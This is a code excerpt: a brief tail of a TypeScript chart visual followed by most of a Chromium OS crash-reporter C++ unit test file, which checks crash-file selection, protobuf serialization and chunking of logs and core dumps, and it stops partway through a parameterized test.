this.options.bars.style("fill-opacity", (dataPoint: MekkoChartColumnDataPoint) => {
return utils.getFillOpacity(
dataPoint.selected,
dataPoint.highlight,
!dataPoint.highlight && hasSelection,
!dataPoint.selected && this.options.hasHighlights);
});
}
private static getDatumForLastInputEvent(): SelectionDataPoint {
const target: EventTarget = (getEvent() as MouseEvent).target;
return select((<any>target)).datum() as any;
}
}
|
// Copyright 2020 The Chromium OS Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#include "crash-reporter/crash_serializer.h"
#include <string>
#include <tuple>
#include <utility>
#include <vector>
#include <inttypes.h>
#include <base/big_endian.h>
#include <base/files/file_util.h>
#include <base/files/scoped_temp_dir.h>
#include <base/strings/stringprintf.h>
#include <gmock/gmock.h>
#include <gtest/gtest.h>
#include "crash-reporter/crash_sender_base.h"
#include "crash-reporter/crash_sender_paths.h"
#include "crash-reporter/crash_serializer.pb.h"
#include "crash-reporter/paths.h"
#include "crash-reporter/test_util.h"
using test_util::kFakeClientId;
namespace crash_serializer {
namespace {
// Set the file flag which indicates we are mocking crash sending, either
// successfully or as a failure.
bool SetMockCrashSending(bool success) {
return test_util::CreateFile(
paths::GetAt(paths::kSystemRunStateDirectory, paths::kMockCrashSending),
success ? "" : "0");
}
} // namespace
class CrashSerializerTest : public testing::Test {
protected:
void SetUp() override {
ASSERT_TRUE(temp_dir_.CreateUniqueTempDir());
test_dir_ = temp_dir_.GetPath();
paths::SetPrefixForTesting(test_dir_);
// Make sure the directory for the lock file exists.
const base::FilePath lock_file_path =
paths::Get(paths::kCrashSenderLockFile);
const base::FilePath lock_file_directory = lock_file_path.DirName();
ASSERT_TRUE(base::CreateDirectory(lock_file_directory));
}
void TearDown() override { paths::SetPrefixForTesting(base::FilePath()); }
// Creates a file at |file_path| with contents |content| and sets its access
// and modification time to |timestamp|.
bool CreateFile(const base::FilePath& file_path,
base::StringPiece content,
base::Time timestamp) {
if (!test_util::CreateFile(file_path, content))
return false;
if (!test_util::TouchFileHelper(file_path, timestamp))
return false;
return true;
}
// Creates test crash files in |crash_directory|. Returns true on success.
bool CreateTestCrashFiles(const base::FilePath& crash_directory) {
const base::Time now = test_util::GetDefaultTime();
const base::TimeDelta hour = base::TimeDelta::FromHours(1);
// Choose timestamps so that the return value of GetMetaFiles() is sorted
// per timestamps correctly.
const base::Time old_os_meta_time = now - base::TimeDelta::FromDays(200);
const base::Time good_meta_time = now - hour * 4;
const base::Time absolute_meta_time = now - hour * 3;
const base::Time uploaded_meta_time = now - hour * 2;
const base::Time recent_os_meta_time = now - hour;
const base::Time devcore_meta_time = now;
// These should be serialized, since the payload is a known kind and exists.
good_meta_ = crash_directory.Append("good.meta");
good_log_ = crash_directory.Append("good.log");
if (!CreateFile(good_meta_, "payload=good.log\ndone=1\n", good_meta_time))
return false;
if (!CreateFile(good_log_, "", now))
return false;
// These should be serialized, the payload path is absolute but should be
// handled properly.
absolute_meta_ = crash_directory.Append("absolute.meta");
absolute_log_ = crash_directory.Append("absolute.log");
if (!CreateFile(absolute_meta_,
"payload=" + absolute_log_.value() + "\n" + "done=1\n",
absolute_meta_time))
return false;
if (!CreateFile(absolute_log_, "", now))
return false;
// These should be serialized, even though the `alreadyuploaded` file
// exists.
uploaded_meta_ = crash_directory.Append("uploaded.meta");
uploaded_log_ = crash_directory.Append("uploaded.log");
uploaded_already_ = crash_directory.Append("uploaded.alreadyuploaded");
if (!CreateFile(uploaded_meta_, "payload=uploaded.log\ndone=1\n",
uploaded_meta_time))
return false;
if (!CreateFile(uploaded_log_, "", now))
return false;
if (!CreateFile(uploaded_already_, "", now))
return false;
// This should be ignored as corrupt. Payload can't be /.
root_payload_meta_ = crash_directory.Append("root_payload.meta");
if (!test_util::CreateFile(root_payload_meta_,
"payload=/\n"
"done=1\n"))
return false;
// These should be serialized -- serializing devcore files is always OK
// (as opposed to sending them, which is only sometimes okay).
devcore_meta_ = crash_directory.Append("devcore.meta");
devcore_devcore_ = crash_directory.Append("devcore.devcore");
if (!CreateFile(devcore_meta_,
"payload=devcore.devcore\n"
"done=1\n",
devcore_meta_time))
return false;
if (!CreateFile(devcore_devcore_, "", now))
return false;
// This should be ignored, since metadata is corrupted.
corrupted_meta_ = crash_directory.Append("corrupted.meta");
if (!CreateFile(corrupted_meta_, "!@#$%^&*\ndone=1\n", now))
return false;
// This should be ignored, since no payload info is recorded.
empty_meta_ = crash_directory.Append("empty.meta");
if (!CreateFile(empty_meta_, "done=1\n", now))
return false;
// This should be ignored, since the payload file does not exist.
nonexistent_meta_ = crash_directory.Append("nonexistent.meta");
if (!CreateFile(nonexistent_meta_,
"payload=nonexistent.log\n"
"done=1\n",
now))
return false;
// These should be ignored, since the payload is an unknown kind.
unknown_meta_ = crash_directory.Append("unknown.meta");
unknown_xxx_ = crash_directory.Append("unknown.xxx");
if (!CreateFile(unknown_meta_,
"payload=unknown.xxx\n"
"done=1\n",
now))
return false;
if (!CreateFile(unknown_xxx_, "", now))
return false;
// This should be ignored, since it's incomplete.
old_incomplete_meta_ = crash_directory.Append("old_incomplete.meta");
if (!CreateFile(old_incomplete_meta_, "payload=good.log\n", now))
return false;
if (!test_util::TouchFileHelper(old_incomplete_meta_, now - hour * 24))
return false;
// This should be ignored, since it's incomplete.
new_incomplete_meta_ = crash_directory.Append("new_incomplete.meta");
if (!CreateFile(new_incomplete_meta_, "payload=nonexistent.log\n", now))
return false;
// This should be serialized since the OS timestamp is recent.
recent_os_meta_ = crash_directory.Append("recent_os.meta");
if (!CreateFile(recent_os_meta_,
base::StringPrintf(
"payload=recent_os.log\n"
"os_millis=%" PRId64 "\n"
"done=1\n",
(now - base::Time::UnixEpoch()).InMilliseconds()),
recent_os_meta_time)) {
return false;
}
recent_os_log_ = crash_directory.Append("recent_os.log");
if (!CreateFile(recent_os_log_, "", now))
return false;
// This should be serialized despite the old OS timestamp.
old_os_meta_ = crash_directory.Append("old_os.meta");
if (!CreateFile(old_os_meta_,
base::StringPrintf("payload=good.log\n"
"os_millis=%" PRId64 "\n"
"done=1\n",
((now - base::Time::UnixEpoch()) -
base::TimeDelta::FromDays(200))
.InMilliseconds()),
old_os_meta_time)) {
return false;
}
// Create large metadata with the size of 1MiB + 1byte. This should be
// ignored as it's too big.
large_meta_ = crash_directory.Append("large.meta");
if (!CreateFile(large_meta_, std::string(1024 * 1024 + 1, 'x'), now)) {
return false;
}
return true;
}
base::ScopedTempDir temp_dir_;
base::FilePath test_dir_;
base::FilePath good_meta_;
base::FilePath good_log_;
base::FilePath absolute_meta_;
base::FilePath absolute_log_;
base::FilePath uploaded_meta_;
base::FilePath uploaded_log_;
base::FilePath uploaded_already_;
base::FilePath root_payload_meta_;
base::FilePath devcore_meta_;
base::FilePath devcore_devcore_;
base::FilePath empty_meta_;
base::FilePath corrupted_meta_;
base::FilePath nonexistent_meta_;
base::FilePath unknown_meta_;
base::FilePath unknown_xxx_;
base::FilePath old_incomplete_meta_;
base::FilePath new_incomplete_meta_;
base::FilePath recent_os_meta_;
base::FilePath recent_os_log_;
base::FilePath old_os_meta_;
base::FilePath large_meta_;
};
TEST_F(CrashSerializerTest, PickCrashFiles) {
Serializer::Options options;
Serializer serializer(std::make_unique<test_util::AdvancingClock>(), options);
const base::FilePath crash_directory =
paths::Get(paths::kSystemCrashDirectory);
ASSERT_TRUE(CreateDirectory(crash_directory));
ASSERT_TRUE(CreateTestCrashFiles(crash_directory));
std::vector<util::MetaFile> to_serialize;
serializer.PickCrashFiles(crash_directory, &to_serialize);
// Everything should still exist
EXPECT_TRUE(base::PathExists(good_meta_));
EXPECT_TRUE(base::PathExists(good_log_));
EXPECT_TRUE(base::PathExists(absolute_meta_));
EXPECT_TRUE(base::PathExists(absolute_log_));
EXPECT_TRUE(base::PathExists(uploaded_meta_));
EXPECT_TRUE(base::PathExists(uploaded_log_));
EXPECT_TRUE(base::PathExists(uploaded_already_));
EXPECT_TRUE(base::PathExists(root_payload_meta_));
EXPECT_TRUE(base::PathExists(devcore_meta_));
EXPECT_TRUE(base::PathExists(devcore_devcore_));
EXPECT_TRUE(base::PathExists(empty_meta_));
EXPECT_TRUE(base::PathExists(corrupted_meta_));
EXPECT_TRUE(base::PathExists(nonexistent_meta_));
EXPECT_TRUE(base::PathExists(unknown_meta_));
EXPECT_TRUE(base::PathExists(unknown_xxx_));
EXPECT_TRUE(base::PathExists(old_incomplete_meta_));
EXPECT_TRUE(base::PathExists(new_incomplete_meta_));
EXPECT_TRUE(base::PathExists(recent_os_meta_));
EXPECT_TRUE(base::PathExists(recent_os_log_));
EXPECT_TRUE(base::PathExists(old_os_meta_));
EXPECT_TRUE(base::PathExists(large_meta_));
ASSERT_EQ(6, to_serialize.size());
// Sort the reports to allow for deterministic testing
util::SortReports(&to_serialize);
EXPECT_EQ(old_os_meta_.value(), to_serialize[0].first.value());
EXPECT_EQ(good_meta_.value(), to_serialize[1].first.value());
EXPECT_EQ(absolute_meta_.value(), to_serialize[2].first.value());
EXPECT_EQ(uploaded_meta_.value(), to_serialize[3].first.value());
EXPECT_EQ(recent_os_meta_.value(), to_serialize[4].first.value());
EXPECT_EQ(devcore_meta_.value(), to_serialize[5].first.value());
}
TEST_F(CrashSerializerTest, SerializeCrashes) {
std::vector<util::MetaFile> crashes_to_serialize;
// Establish the client ID.
ASSERT_TRUE(test_util::CreateClientIdFile());
// Set up mock sending so we use the fake sleep function
ASSERT_TRUE(SetMockCrashSending(true));
// Create the system crash directory, and crash files in it.
const base::FilePath system_dir = paths::Get(paths::kSystemCrashDirectory);
ASSERT_TRUE(base::CreateDirectory(system_dir));
const base::FilePath system_meta_file = system_dir.Append("0.0.0.0.meta");
const base::FilePath system_log = system_dir.Append("0.0.0.0.log");
const base::FilePath system_processing =
system_dir.Append("0.0.0.0.processing");
const char system_meta[] =
"payload=0.0.0.0.log\n"
"exec_name=exec_foo\n"
"fake_report_id=123\n"
"upload_var_prod=foo\n"
"done=1\n"
"upload_var_reportTimeMillis=1000000\n";
ASSERT_TRUE(test_util::CreateFile(system_meta_file, system_meta));
ASSERT_TRUE(test_util::CreateFile(system_log, "system log data"));
util::CrashInfo system_info;
EXPECT_TRUE(system_info.metadata.LoadFromString(system_meta));
system_info.payload_file = system_log;
system_info.payload_kind = "log";
EXPECT_TRUE(base::Time::FromString("25 Apr 2018 1:23:44 GMT",
&system_info.last_modified));
crashes_to_serialize.emplace_back(system_meta_file, std::move(system_info));
// Create a user crash directory, and crash files in it.
const base::FilePath user_dir = paths::Get("/home/user/hash/crash");
ASSERT_TRUE(base::CreateDirectory(user_dir));
const base::FilePath user_meta_file = user_dir.Append("0.0.0.0.meta");
const base::FilePath user_log = user_dir.Append("0.0.0.0.log");
const base::FilePath user_core = user_dir.Append("0.0.0.0.core");
const base::FilePath user_processing = user_dir.Append("0.0.0.0.processing");
const char user_meta[] =
"payload=0.0.0.0.log\n"
"exec_name=exec_bar\n"
"fake_report_id=456\n"
"upload_var_prod=bar\n"
"done=1\n"
"upload_var_reportTimeMillis=2000000\n";
ASSERT_TRUE(test_util::CreateFile(user_meta_file, user_meta));
ASSERT_TRUE(test_util::CreateFile(user_log, "user log data"));
ASSERT_TRUE(test_util::CreateFile(user_core, "user core"));
util::CrashInfo user_info;
EXPECT_TRUE(user_info.metadata.LoadFromString(user_meta));
user_info.payload_file = user_log;
user_info.payload_kind = "log";
EXPECT_TRUE(base::Time::FromString("25 Apr 2018 1:24:01 GMT",
&user_info.last_modified));
crashes_to_serialize.emplace_back(user_meta_file, std::move(user_info));
// Set up the serializer.
std::vector<base::TimeDelta> sleep_times;
Serializer::Options options;
options.fetch_coredumps = true;
options.sleep_function = base::Bind(&test_util::FakeSleep, &sleep_times);
Serializer serializer(std::make_unique<test_util::AdvancingClock>(), options);
base::FilePath out = test_dir_.Append("SerializeCrashes");
ASSERT_TRUE(test_util::CreateFile(out, ""));
serializer.set_output_for_testing(out);
serializer.SerializeCrashes(crashes_to_serialize);
EXPECT_EQ(2, sleep_times.size());
// We shouldn't be processing any crashes still.
EXPECT_FALSE(base::PathExists(system_processing));
EXPECT_FALSE(base::PathExists(user_processing));
std::string written;
ASSERT_TRUE(base::ReadFileToString(out, &written));
// Deserialize the data.
std::vector<crash::FetchCrashesResponse> resps;
uint64_t pos = 0;
while (pos < written.size()) {
std::string size_str = written.substr(pos, sizeof(uint64_t));
uint64_t size;
base::ReadBigEndian(size_str.data(), &size);
pos += sizeof(size);
// All of our payloads are small, so don't need to combine subsequent
// response protos into one.
crash::FetchCrashesResponse resp;
resp.ParseFromString(written.substr(pos, size));
resps.push_back(resp);
pos += size;
}
ASSERT_EQ(resps.size(), 5);
// Verify system crash
EXPECT_EQ(resps[0].crash_id(), 0);
ASSERT_TRUE(resps[0].has_crash());
EXPECT_EQ(resps[0].crash().exec_name(), "exec_foo");
EXPECT_EQ(resps[0].crash().prod(), "foo");
EXPECT_EQ(resps[0].crash().ver(), "undefined");
EXPECT_EQ(resps[0].crash().sig(), "");
EXPECT_EQ(resps[0].crash().in_progress_integration_test(), "");
EXPECT_EQ(resps[0].crash().collector(), "");
EXPECT_EQ(resps[0].crash().collector(), "");
int num_fields = resps[0].crash().fields_size();
ASSERT_GE(num_fields, 7);
EXPECT_EQ(resps[0].crash().fields(6).key(), "guid");
EXPECT_EQ(resps[0].crash().fields(6).text(), kFakeClientId);
EXPECT_EQ(resps[1].crash_id(), 0);
ASSERT_TRUE(resps[1].has_blob());
EXPECT_EQ(resps[1].blob().key(), "upload_file_log");
EXPECT_EQ(resps[1].blob().filename(), "0.0.0.0.log");
EXPECT_EQ(resps[1].blob().blob(), "system log data");
// Verify user crash
EXPECT_EQ(resps[2].crash_id(), 1);
ASSERT_TRUE(resps[2].has_crash());
EXPECT_EQ(resps[2].crash().exec_name(), "exec_bar");
EXPECT_EQ(resps[2].crash().prod(), "bar");
EXPECT_EQ(resps[2].crash().ver(), "undefined");
EXPECT_EQ(resps[2].crash().sig(), "");
EXPECT_EQ(resps[2].crash().in_progress_integration_test(), "");
EXPECT_EQ(resps[2].crash().collector(), "");
num_fields = resps[2].crash().fields_size();
ASSERT_GE(num_fields, 7);
EXPECT_EQ(resps[2].crash().fields(6).key(), "guid");
EXPECT_EQ(resps[2].crash().fields(6).text(), kFakeClientId);
EXPECT_EQ(resps[3].crash_id(), 1);
ASSERT_TRUE(resps[3].has_blob());
EXPECT_EQ(resps[3].blob().key(), "upload_file_log");
EXPECT_EQ(resps[3].blob().filename(), "0.0.0.0.log");
EXPECT_EQ(resps[3].blob().blob(), "user log data");
EXPECT_EQ(resps[4].crash_id(), 1);
EXPECT_EQ(resps[4].crash_id(), 1);
// proto3 doesn't create has_XXX methods for string oneof fields, so don't
// check has_core()
EXPECT_EQ(resps[4].core(), "user core");
// The uploaded crash files should not be removed.
EXPECT_TRUE(base::PathExists(system_meta_file));
EXPECT_TRUE(base::PathExists(system_log));
EXPECT_TRUE(base::PathExists(user_meta_file));
EXPECT_TRUE(base::PathExists(user_log));
EXPECT_TRUE(base::PathExists(user_core));
}
TEST_F(CrashSerializerTest, WriteFetchCrashesResponse) {
crash::FetchCrashesResponse resp;
resp.set_crash_id(0x1234'5678'9abc'def0);
resp.set_core(std::string("\00\x11\x22\x33", 4));
std::string expected;
resp.SerializeToString(&expected);
Serializer::Options options;
Serializer serializer(std::make_unique<test_util::AdvancingClock>(), options);
base::FilePath out = test_dir_.Append("WriteFetchCrashesResponse");
ASSERT_TRUE(test_util::CreateFile(out, ""));
serializer.set_output_for_testing(out);
ASSERT_TRUE(serializer.WriteFetchCrashesResponse(resp));
std::string actual;
ASSERT_TRUE(base::ReadFileToString(out, &actual));
// Read the size and verify that it matches what we expect.
std::string actual_size_str = actual.substr(0, sizeof(uint64_t));
uint64_t actual_size;
base::ReadBigEndian(actual_size_str.data(), &actual_size);
EXPECT_EQ(expected.size(), actual_size);
// Note that we don't verify that the size in bytes matches, because to do so
// we'd either have to:
// 1) Reproduce the logic in WriteFetchCrashesResponse that converts the size
// to a string, or
// 2) Hard-code an expected size, which would be brittle and subject to
// breakage if the protobuf serialization format changes at all in future.
EXPECT_EQ(expected, actual.substr(sizeof(uint64_t)));
}
TEST_F(CrashSerializerTest, WriteFetchCrashesResponse_WriteFail) {
crash::FetchCrashesResponse resp;
resp.set_crash_id(42);
resp.set_core("asdf");
Serializer::Options options;
Serializer serializer(std::make_unique<test_util::AdvancingClock>(), options);
base::FilePath out = test_dir_.Append("WriteFetchCrashesResponse_WriteFail");
// Don't create file -- Append in serializer will fail.
serializer.set_output_for_testing(out);
EXPECT_FALSE(serializer.WriteFetchCrashesResponse(resp));
}
TEST_F(CrashSerializerTest, WriteBlobs_Basic) {
std::vector<crash::CrashBlob> blobs;
crash::CrashBlob blob1;
blob1.set_key("1701d");
blob1.set_filename("jean.luc.picard");
blob1.set_blob("boldly go");
blobs.push_back(blob1);
crash::CrashBlob blob2;
blob2.set_key("nx01");
blob2.set_filename("jonathan.archer");
blob2.set_blob("temporal cold war");
blobs.push_back(blob2);
Serializer::Options options;
Serializer serializer(std::make_unique<test_util::AdvancingClock>(), options);
base::FilePath out = test_dir_.Append("WriteBlobs_Basic");
ASSERT_TRUE(test_util::CreateFile(out, ""));
serializer.set_output_for_testing(out);
ASSERT_TRUE(serializer.WriteBlobs(/*crash_id=*/42, blobs));
std::string actual;
ASSERT_TRUE(base::ReadFileToString(out, &actual));
uint64_t pos = 0;
for (const auto& blob : blobs) {
std::string actual_size_str = actual.substr(pos, sizeof(uint64_t));
pos += sizeof(uint64_t);
uint64_t actual_size;
base::ReadBigEndian(actual_size_str.data(), &actual_size);
crash::FetchCrashesResponse resp;
resp.ParseFromString(actual.substr(pos, actual_size));
EXPECT_EQ(resp.crash_id(), 42);
EXPECT_EQ(resp.blob().key(), blob.key());
EXPECT_EQ(resp.blob().filename(), blob.filename());
EXPECT_EQ(resp.blob().blob(), blob.blob());
pos += actual_size;
}
EXPECT_EQ(pos, actual.size()); // should be at end of string
}
TEST_F(CrashSerializerTest, WriteBlobs_ManySizes) {
Serializer::Options options;
options.max_proto_bytes = 18; // choose an arbitrary (but small) maximum
Serializer serializer(std::make_unique<test_util::AdvancingClock>(), options);
base::FilePath out = test_dir_.Append("WriteBlobs_ManySizes");
ASSERT_TRUE(test_util::CreateFile(out, ""));
serializer.set_output_for_testing(out);
std::vector<crash::CrashBlob> blobs;
for (int i = 0; i < options.max_proto_bytes * 5; i++) {
crash::CrashBlob blob;
blob.set_key(base::StringPrintf("%d", i));
blob.set_filename(base::StringPrintf("%d.blob", i));
blob.set_blob(std::string('A', i));
blobs.push_back(blob);
}
ASSERT_TRUE(serializer.WriteBlobs(/*crash_id=*/0xc0de, blobs));
std::string actual;
ASSERT_TRUE(base::ReadFileToString(out, &actual));
std::vector<crash::CrashBlob> actual_blobs;
uint64_t pos = 0;
while (pos < actual.size()) {
std::string actual_size_str = actual.substr(pos, sizeof(uint64_t));
pos += sizeof(uint64_t);
uint64_t actual_size;
base::ReadBigEndian(actual_size_str.data(), &actual_size);
crash::FetchCrashesResponse resp;
resp.ParseFromString(actual.substr(pos, actual_size));
pos += actual_size;
EXPECT_EQ(resp.crash_id(), 0xc0de);
crash::CrashBlob blob = resp.blob();
EXPECT_LE(blob.blob().size(), options.max_proto_bytes);
if (actual_blobs.size() > 0 && actual_blobs.back().key() == blob.key()) {
EXPECT_EQ(actual_blobs.back().filename(), blob.filename());
actual_blobs.back().set_blob(actual_blobs.back().blob() + blob.blob());
} else {
actual_blobs.push_back(blob);
}
}
ASSERT_EQ(actual_blobs.size(), blobs.size());
for (int i = 0; i < actual_blobs.size(); i++) {
EXPECT_EQ(actual_blobs[i].key(), blobs[i].key());
EXPECT_EQ(actual_blobs[i].filename(), blobs[i].filename());
EXPECT_EQ(actual_blobs[i].blob(), blobs[i].blob());
}
}
TEST_F(CrashSerializerTest, WriteBlobs_Empty) {
Serializer::Options options;
Serializer serializer(std::make_unique<test_util::AdvancingClock>(), options);
base::FilePath out = test_dir_.Append("WriteBlobs_Empty");
// Don't create file -- we shouldn't write to it.
serializer.set_output_for_testing(out);
std::vector<crash::CrashBlob> blobs;
EXPECT_TRUE(serializer.WriteBlobs(/*crash_id=*/0, blobs));
}
TEST_F(CrashSerializerTest, WriteBlobs_Failure) {
Serializer::Options options;
Serializer serializer(std::make_unique<test_util::AdvancingClock>(), options);
base::FilePath out = test_dir_.Append("WriteBlobs_Failure");
// Don't create file -- Append in serializer will fail.
serializer.set_output_for_testing(out);
std::vector<crash::CrashBlob> blobs;
crash::CrashBlob blob;
blob.set_key("key mckeyface");
blob.set_filename("key.face");
blob.set_blob("asdf");
blobs.push_back(blob);
EXPECT_FALSE(serializer.WriteBlobs(/*crash_id=*/1, blobs));
}
TEST_F(CrashSerializerTest, WriteCoredump_Basic) {
// Core dumps can and do have null bytes in them.
std::string core_contents("\x00\x11\x22\x33", 4);
ASSERT_EQ(core_contents.size(), 4);
crash::FetchCrashesResponse resp;
resp.set_crash_id(0x1234'5678'9abc'def0);
resp.set_core(core_contents);
std::string expected;
resp.SerializeToString(&expected);
base::FilePath core = test_dir_.Append("core");
ASSERT_TRUE(test_util::CreateFile(core, core_contents));
Serializer::Options options;
Serializer serializer(std::make_unique<test_util::AdvancingClock>(), options);
base::FilePath out = test_dir_.Append("WriteCoredump");
ASSERT_TRUE(test_util::CreateFile(out, ""));
serializer.set_output_for_testing(out);
ASSERT_TRUE(
serializer.WriteCoredump(/*crash_id=*/0x1234'5678'9abc'def0, core));
std::string actual;
ASSERT_TRUE(base::ReadFileToString(out, &actual));
std::string actual_size_str = actual.substr(0, sizeof(uint64_t));
uint64_t actual_size;
base::ReadBigEndian(actual_size_str.data(), &actual_size);
EXPECT_EQ(expected.size(), actual_size);
EXPECT_EQ(expected, actual.substr(sizeof(uint64_t)));
}
TEST_F(CrashSerializerTest, WriteCoredump_LargerThanChunkSize) {
std::string core_contents("0123456789abcdef");
base::FilePath core = test_dir_.Append("core");
ASSERT_TRUE(test_util::CreateFile(core, core_contents));
crash::FetchCrashesResponse resp1;
resp1.set_crash_id(1);
resp1.set_core("0123456789");
std::string expected1;
resp1.SerializeToString(&expected1);
crash::FetchCrashesResponse resp2;
resp2.set_crash_id(1); // same crash id
resp2.set_core("abcdef");
std::string expected2;
resp2.SerializeToString(&expected2);
Serializer::Options options;
options.max_proto_bytes = 10;
Serializer serializer(std::make_unique<test_util::AdvancingClock>(), options);
base::FilePath out = test_dir_.Append("WriteCoredump_LargerThanChunkSize");
ASSERT_TRUE(test_util::CreateFile(out, ""));
serializer.set_output_for_testing(out);
ASSERT_TRUE(serializer.WriteCoredump(/*crash_id=*/1, core));
std::string actual;
ASSERT_TRUE(base::ReadFileToString(out, &actual));
uint64_t pos = 0;
std::string actual_size_str1 = actual.substr(0, sizeof(uint64_t));
pos += sizeof(uint64_t);
uint64_t actual_size1;
base::ReadBigEndian(actual_size_str1.data(), &actual_size1);
EXPECT_EQ(expected1.size(), actual_size1);
EXPECT_EQ(expected1, actual.substr(pos, actual_size1));
pos += actual_size1;
std::string actual_size_str2 = actual.substr(pos, sizeof(uint64_t));
pos += sizeof(uint64_t);
uint64_t actual_size2;
base::ReadBigEndian(actual_size_str2.data(), &actual_size2);
EXPECT_EQ(expected2.size(), actual_size2);
EXPECT_EQ(expected2, actual.substr(pos));
}
// Verify that core dump splitting works at many different core sizes (with
// different relationships to the chunk size).
TEST_F(CrashSerializerTest, WriteCoredump_ManySizes) {
const int kChunkSize = 10;
Serializer::Options options;
options.max_proto_bytes = kChunkSize;
Serializer serializer(std::make_unique<test_util::AdvancingClock>(), options);
for (int core_size = 1; core_size <= kChunkSize * 5; core_size++) {
std::string core_contents('0', core_size);
base::FilePath core = test_dir_.Append("core");
ASSERT_TRUE(test_util::CreateFile(core, core_contents));
base::FilePath out = test_dir_.Append("WriteCoredump_ManySizes");
ASSERT_TRUE(test_util::CreateFile(out, ""));
serializer.set_output_for_testing(out);
ASSERT_TRUE(serializer.WriteCoredump(/*crash_id=*/1, core));
std::string actual;
ASSERT_TRUE(base::ReadFileToString(out, &actual));
std::string assembled_core;
crash::FetchCrashesResponse resp;
uint64_t pos = 0;
while (pos < actual.size()) {
std::string actual_size_str = actual.substr(0, sizeof(uint64_t));
pos += sizeof(uint64_t);
uint64_t actual_size;
base::ReadBigEndian(actual_size_str.data(), &actual_size);
resp.ParseFromString(actual.substr(pos, actual_size));
EXPECT_EQ(resp.crash_id(), 1) << "core size: " << core_size;
EXPECT_LE(resp.core().size(), kChunkSize) << "core size: " << core_size;
assembled_core += resp.core();
pos += actual_size;
}
EXPECT_EQ(assembled_core, core_contents) << "core size: " << core_size;
}
}
TEST_F(CrashSerializerTest, WriteCoredump_Nonexistent) {
Serializer::Options options;
Serializer serializer(std::make_unique<test_util::AdvancingClock>(), options);
EXPECT_FALSE(serializer.WriteCoredump(/*crash_id=*/0,
test_dir_.Append("nonexistent.core")));
}
enum MissingFile {
kNone,
kPayloadFile,
kLogFile,
kTextFile,
kBinFile,
kCoreFile,
};
class CrashSerializerParameterizedTest
: public CrashSerializerTest,
public ::testing::WithParamInterface<
std::tuple<bool, bool, MissingFile>> {
protected:
void SetUp() override {
std::tie(absolute_paths_, fetch_core_, missing_file_) = GetParam();
CrashSerializerTest::SetUp();
}
bool absolute_paths_;
bool fetch_core_;
MissingFile missing_file_;
};
TEST_P(CrashSerializerParameterizedTest, SerializeCrash) {
const base::FilePath system_dir = paths::Get(paths::kSystemCrashDirectory);
ASSERT_TRUE(base::CreateDirectory(system_dir));
const base::FilePath payload_file_relative("0.0.0.0.payload");
const base::FilePath payload_file_absolute =
system_dir.Append(payload_file_relative);
const std::string payload_contents = "foobar_payload";
if (missing_file_ != kPayloadFile) {
ASSERT_TRUE(test_util::CreateFile(payload_file_absolute, payload_contents));
}
const base::FilePath& payload_file =
absolute_paths_ ? payload_file_absolute : payload_file_relative;
const base::FilePath log_file_relative("0.0.0.0.log");
const base::FilePath log_file_absolute = system_dir.Append(log_file_relative);
const std::string log_contents = "foobar_log";
if (missing_file_ != kLogFile) {
ASSERT_TRUE(test_util::CreateFile(log_file_absolute, log_contents));
}
const base::FilePath& log_file =
absolute_paths_ ? log_file_absolute : log_file_relative;
const base::FilePath text_var_file_relative("data.txt");
const base::FilePath text_var_file_absolute =
system_dir.Append(text_var_file_relative);
const std::string text_var_contents = "upload_text_contents";
if (missing_file_ != kTextFile) {
ASSERT_TRUE(
test_util::CreateFile(text_var_file_absolute, text_var_contents));
}
const base::FilePath& text_var_file =
absolute_paths_ ? text_var_file_absolute : text_var_file_relative;
const base::FilePath file_var_file_relative("data.bin");
const base::FilePath file_var_file_absolute =
system_dir.Append(file_var_file_relative);
const std::string file_var_contents = "upload_file_contents";
if (missing_file_ != kBinFile) {
ASSERT_TRUE(
test_util::CreateFile(file_var_file_absolute, file_var_contents));
}
const base::FilePath& file_var_file =
absolute_paths_ ? file_var_file_absolute : file_var_file_relative;
const base::FilePath core_file_relative("0.0.0.0.core");
const base::FilePath core_file_absolute =
system_dir.Append(core_file_relative);
const std::string core_contents = "corey_mccoreface";
if (missing_file_ != kCoreFile) {
ASSERT_TRUE(test_util::CreateFile(core_file_absolute, core_contents));
}
brillo::KeyValueStore metadata;
metadata.SetString("exec_name", "fake_exec_name");
metadata.SetString("ver", "fake_chromeos_ver");
metadata.SetString("upload_var_prod", "fake_product");
metadata.SetString("upload_var_ver", "fake_version");
metadata.SetString("sig", "fake_sig");
metadata.SetString("upload_var_guid", "SHOULD_NOT_BE_USED");
metadata.SetString("upload_var_foovar", "bar");
metadata.SetString("upload_var_in_progress_integration_test", "test.Test");
metadata.SetString("upload_var_collector", "fake_collector");
metadata.SetString("upload_text_footext", text_var_file.value());
metadata.SetString("upload_file_log", log_file.value());
metadata.SetString("upload_file_foofile", file_var_file.value());
metadata.SetString("error_type", "fake_error");
util::CrashDetails details = {
.meta_file = base::FilePath(system_dir).Append("0.0.0.0.meta"),
.payload_file = payload_file,
.payload_kind = "fake_payload",
.client_id = kFakeClientId,
.metadata = metadata,
};
Serializer::Options options;
options.fetch_coredumps = fetch_core_;
Serializer serializer(std::make_unique<test_util::AdvancingClock>(), options);
crash::CrashInfo info;
std::vector<crash::CrashBlob> blobs;
base::FilePath core_path;
EXPECT_EQ(serializer.SerializeCrash(details, &info, &blobs, &core_path),
missing_file_ != kPayloadFile);
if (missing_file_ == kPayloadFile) {
return;
}
// We'd really like to set up a proto with the expected values and
// EXPECT_THAT(info, EqualsProto(expected_info)), but EqualsProto is
// unavailable in chromium OS, so do it one field at a time instead.
EXPECT_EQ(info.exec_name(), "fake_exec_name");
EXPECT_EQ(info.prod(), "fake_product");
EXPECT_EQ(info.ver(), "fake_version");
EXPECT_EQ(info.sig(), "fake_sig");
EXPECT_EQ(info.in_progress_integration_test(), "test.Test");
EXPECT_EQ(info.collector(), "fake_collector");
int num_fields = 8;
if (missing_file_ != kTextFile) {
num_fields++;
}
ASSERT_EQ(info.fields_size(), num_fields);
int field_idx = 0;
EXPECT_EQ(info.fields(field_idx).key(), "board");
EXPECT_EQ(info.fields(field_idx).text(), "undefined");
field_idx++;
EXPECT_EQ(info.fields(field_idx).key(), "hwclass");
EXPECT_EQ(info.fields(field_idx).text(), "undefined");
field_idx++;
EXPECT_EQ(info.fields(field_idx).key(), "sig2");
EXPECT_EQ(info.fields(field_idx).text(), "fake_sig");
field_idx++;
EXPECT_EQ(info.fields(field_idx).key(), "image_type");
EXPECT_EQ(info.fields(field_idx).text(), "");
field_idx++;
EXPECT_EQ(info.fields(field_idx).key(), "boot_mode");
EXPECT_EQ(info.fields(field_idx).text(), "missing-crossystem");
field_idx++;
